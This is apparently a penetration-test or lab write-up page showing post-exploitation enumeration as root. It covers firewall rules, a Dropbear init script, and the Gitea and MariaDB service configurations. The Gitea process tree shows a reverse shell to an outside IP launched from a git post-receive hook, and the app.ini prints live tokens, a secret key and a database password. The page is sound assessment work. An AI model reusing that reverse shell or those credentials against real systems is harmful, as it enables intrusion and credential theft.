Beyond
This is the "Beyond" page: additional post-exploitation enumeration and assessment, carried out as the root user after the target system has been compromised.
Firewall

Note: `iptables -L` was run without `-n -v`, so the interface and counter columns are hidden. The unconditional `ACCEPT all` rule at the top of both INPUT and OUTPUT is presumably the loopback (`-i lo` / `-o lo`) rule, but that cannot be confirmed from this listing; re-run with `iptables -L -n -v` (and `ip6tables -L -n -v`, which is not covered here) before drawing conclusions about what is actually exposed. INPUT and OUTPUT both end in a catch-all `DROP`, so despite the `ACCEPT` policy they behave as default-deny; FORWARD has no rules at all.
root@roquefort:/# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:2222
ACCEPT tcp -- anywhere anywhere tcp dpt:3000
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:2222 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:2222 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:3000 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:3000 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:domain state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:domain state NEW,ESTABLISHED
ACCEPT udp -- anywhere anywhere udp dpt:domain state NEW,ESTABLISHED
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Dropbear

Dropbear is a second SSH daemon, listening on port 2222 as root under a systemd-sysv-generated unit. The firewall also allows port 22, which is presumably served by OpenSSH, but that service is not shown on this page.
root@roquefort:/# systemctl status dropbear.service
systemctl status dropbear.service
● dropbear.service - LSB: Lightweight SSH server
Loaded: loaded (/etc/init.d/dropbear; generated; vendor preset: enabled)
Active: active (running) since Fri 2024-08-02 15:07:09 EDT; 8 months 1 days ago
Docs: man:systemd-sysv-generator(8)
Process: 457 ExecStart=/etc/init.d/dropbear start (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 4915)
CGroup: /system.slice/dropbear.service
└─537 /usr/sbin/dropbear -p 2222 -W 65536
root@roquefort:/# cat /etc/init.d/dropbear
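#!/bin/sh
### BEGIN INIT INFO
# Provides:          dropbear
# Required-Start:    $remote_fs $syslog
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Lightweight SSH server
# Description:       Init script for dropbear SSH server. Edit
#                    /etc/default/dropbear to configure the server.
### END INIT INFO
#
# Do not configure this file. Edit /etc/default/dropbear instead!
#
# Security note: this script runs as root and *sources* /etc/default/dropbear
# as shell code every time it is invoked, so anything able to write that file
# (or /usr/sbin/dropbear itself) gets root code execution. Permissions on
# both paths were not captured on this page; verify them as part of the
# assessment.
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/sbin/dropbear
NAME=dropbear
DESC="Dropbear SSH server"
DEFAULTCFG=/etc/default/dropbear

# Built-in defaults; each may be overridden by $DEFAULTCFG. The running
# daemon listens on 2222, so this host's defaults file presumably sets
# DROPBEAR_PORT (that file is not shown here).
DROPBEAR_PORT=22
DROPBEAR_EXTRA_ARGS=
NO_START=0

set -e
. /lib/lsb/init-functions

# Report a reason on stderr and exit *successfully* (status 0): a missing
# daemon or a disabled service must not fail the boot sequence.
cancel() { echo "$1" >&2; exit 0; };

test ! -r "$DEFAULTCFG" || . "$DEFAULTCFG"
test -x "$DAEMON" || cancel "$DAEMON does not exist or is not executable."
test ! -x /usr/sbin/update-service || ! update-service --check dropbear ||
  cancel 'The dropbear service is controlled through runit, use the sv(8) program'

# Turn optional settings from $DEFAULTCFG into dropbear flags. Host keys are
# only passed when the file exists; -r is used for every key type.
# DROPBEAR_EXTRA_ARGS is a space-separated list of flags and is deliberately
# left unquoted on the command line so that it word-splits.
[ ! "$DROPBEAR_BANNER" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -b $DROPBEAR_BANNER"
[ ! -f "$DROPBEAR_RSAKEY" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -r $DROPBEAR_RSAKEY"
[ ! -f "$DROPBEAR_DSSKEY" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -r $DROPBEAR_DSSKEY"
[ ! -f "$DROPBEAR_ECDSAKEY" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -r $DROPBEAR_ECDSAKEY"
test -n "$DROPBEAR_RECEIVE_WINDOW" || \
  DROPBEAR_RECEIVE_WINDOW="65536"

# The one place the daemon command line is built. "start" and "restart"
# previously each carried their own copy, and the restart copy also expanded
# an undefined $DROPBEAR_KEYS that "start" never used, so a defaults file
# that happened to set that name would launch dropbear with different
# arguments depending on which action was used. Sharing the helper removes
# that drift.
do_start() {
  start-stop-daemon --start --quiet --pidfile /var/run/"$NAME".pid \
    --exec "$DAEMON" -- -p "$DROPBEAR_PORT" -W "$DROPBEAR_RECEIVE_WINDOW" $DROPBEAR_EXTRA_ARGS
}

# Stop via the pidfile; --oknodo keeps "stop" successful when nothing runs.
do_stop() {
  start-stop-daemon --stop --quiet --oknodo --pidfile /var/run/"$NAME".pid
}

case "$1" in
  start)
    test "$NO_START" = "0" ||
      cancel "Starting $DESC: [abort] NO_START is not set to zero in $DEFAULTCFG"
    echo -n "Starting $DESC: "
    do_start
    echo "$NAME."
    ;;
  stop)
    echo -n "Stopping $DESC: "
    do_stop
    echo "$NAME."
    ;;
  restart|force-reload)
    test "$NO_START" = "0" ||
      cancel "Restarting $DESC: [abort] NO_START is not set to zero in $DEFAULTCFG"
    echo -n "Restarting $DESC: "
    do_stop
    sleep 1
    do_start
    echo "$NAME."
    ;;
  status)
    status_of_proc -p /var/run/"$NAME".pid $DAEMON $NAME && exit 0 || exit $?
    ;;
  *)
    N=/etc/init.d/$NAME
    echo "Usage: $N {start|stop|status|restart|force-reload}" >&2
    exit 1
    ;;
esac

exit 0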
Gitea

Note: the `app.ini` below contains live secrets (INTERNAL_TOKEN, SECRET_KEY, the database PASSWD and LFS_JWT_SECRET). Having been read as root they must be treated as compromised: rotate them on any real engagement, and redact them before this page is shared. The process tree also shows a reverse shell to 192.168.45.249 still attached under the `post-receive` hook of `test/rce1.git`, running as the service's `User=chloe`, which appears to be how the foothold was obtained. Open self-registration (`DISABLE_REGISTRATION = false`) is worth calling out separately in the findings.
root@roquefort:/# systemctl status gitea.service
● gitea.service - Gitea (Git with a cup of tea)
Loaded: loaded (/etc/systemd/system/gitea.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-08-02 15:07:12 EDT; 8 months 1 days ago
Main PID: 747 (gitea)
Tasks: 22 (limit: 4915)
CGroup: /system.slice/gitea.service
├─ 747 /usr/local/bin/gitea web --config /etc/gitea/app.ini
├─1205 /bin/sh -c git-receive-pack '/home/chloe/gitea-repositories/test/rce1.git' git-receive-pack '/home/chloe/gitea-repositories/test/rce1.git'
├─1206 git-receive-pack /home/chloe/gitea-repositories/test/rce1.git
├─1237 bash hooks/post-receive
├─1250 /bin/bash ./hooks/post-receive.d/post-receive
├─1251 bash -c bash -i >& /dev/tcp/192.168.45.249/2222 0>&1
├─1252 bash -i
└─1305 ./pspy64
root@roquefort:/# cat /etc/systemd/system/gitea.service
[Unit]
Description=Gitea (Git with a cup of tea)
After=syslog.target
After=network.target
Requires=mariadb.service
[Service]
RestartSec=2s
Type=simple
User=chloe
Group=chloe
WorkingDirectory=/var/lib/gitea/
ExecStart=/usr/local/bin/gitea web --config /etc/gitea/app.ini
Restart=always
Environment=USER=chloe HOME=/home/chloe GITEA_WORK_DIR=/var/lib/gitea
[Install]
WantedBy=multi-user.target
root@roquefort:/# cat /etc/gitea/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_USER = chloe
RUN_MODE = prod
[security]
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE1ODcwMjE0OTN9.MJ7tNyllwrVX-1KrwFs2n33sVklzKF044wPsPld_TV8
INSTALL_LOCK = true
SECRET_KEY = 6jWzFW4a2otfWHLtnHRE69zuCL2ffh4ZeMF29CBAQfH7xMZPPBXR1XuuZXZ6s8m4
[database]
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = giteadb
USER = gitea
PASSWD = 7d98afcbd8a6c5b8c2dfb07bcbe29d34
SSL_MODE = disable
PATH = data/gitea.db
[repository]
ROOT = /home/chloe/gitea-repositories
[server]
SSH_DOMAIN = localhost
DOMAIN = localhost
HTTP_PORT = 3000
ROOT_URL = http://localhost:3000/
DISABLE_SSH = false
SSH_PORT = 22
LFS_START_SERVER = true
LFS_CONTENT_PATH = /var/lib/gitea/data/lfs
LFS_JWT_SECRET = y3E8LFr-gJTlVmu9JZbDArkyfDW3ca4x7X85yY-w_P8
OFFLINE_MODE = true
[mailer]
ENABLED = false
[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.example.org
[picture]
DISABLE_GRAVATAR = false
ENABLE_FEDERATED_AVATAR = true
[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true
[session]
PROVIDER = file
[log]
MODE = file
LEVEL = Info
ROOT_PATH = /var/lib/gitea/log
MariaDB

The unit below applies some hardening (CapabilityBoundingSet, ProtectSystem=full, ProtectHome=true), but the `gitea` database credentials in `app.ini` above still give direct access on 127.0.0.1:3306 to anyone who can read that file.
root@roquefort:/# systemctl status mariadb.service
● mariadb.service - MariaDB 10.1.44 database server
Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-08-02 15:07:10 EDT; 8 months 1 days ago
Docs: man:mysqld(8)
https://mariadb.com/kb/en/library/systemd/
Process: 742 ExecStartPost=/bin/sh -c systemctl unset-environment _WSREP_START_POSITION (code=exited, status=0/SUCCESS)
Process: 740 ExecStartPost=/etc/mysql/debian-start (code=exited, status=0/SUCCESS)
Process: 535 ExecStartPre=/bin/sh -c [ ! -e /usr/bin/galera_recovery ] && VAR= || VAR=`/usr/bin/galera_recovery`; [ $? -eq 0 ] && systemctl set-environment _WSREP_START_POSITION=$VAR || exit 1 (code=exited, status=0/SUCCESS)
Process: 531 ExecStartPre=/bin/sh -c systemctl unset-environment _WSREP_START_POSITION (code=exited, status=0/SUCCESS)
Process: 508 ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d /var/run/mysqld (code=exited, status=0/SUCCESS)
Main PID: 633 (mysqld)
Status: "Taking your SQL requests now..."
Tasks: 32 (limit: 4915)
CGroup: /system.slice/mariadb.service
└─633 /usr/sbin/mysqld
root@roquefort:/# cat /lib/systemd/system/mariadb.service | grep -v '^#'
[Unit]
Description=MariaDB 10.1.44 database server
Documentation=man:mysqld(8)
Documentation=https://mariadb.com/kb/en/library/systemd/
After=network.target
[Install]
WantedBy=multi-user.target
Alias=mysql.service
Alias=mysqld.service
[Service]
Type=notify
PrivateNetwork=false
User=mysql
Group=mysql
CapabilityBoundingSet=CAP_IPC_LOCK
ProtectSystem=full
PrivateDevices=true
ProtectHome=true
PermissionsStartOnly=true
ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d /var/run/mysqld
ExecStartPre=/bin/sh -c "systemctl unset-environment _WSREP_START_POSITION"
ExecStartPre=/bin/sh -c "[ ! -e /usr/bin/galera_recovery ] && VAR= || \
VAR=`/usr/bin/galera_recovery`; [ $? -eq 0 ] \
&& systemctl set-environment _WSREP_START_POSITION=$VAR || exit 1"
ExecStart=/usr/sbin/mysqld $MYSQLD_OPTS $_WSREP_NEW_CLUSTER $_WSREP_START_POSITION
ExecStartPost=/etc/mysql/debian-start
ExecStartPost=/bin/sh -c "systemctl unset-environment _WSREP_START_POSITION"
KillSignal=SIGTERM
SendSIGKILL=no
Restart=on-abort
RestartSec=5s
UMask=007
PrivateTmp=false
TimeoutStartSec=900
TimeoutStopSec=900
LimitNOFILE=16364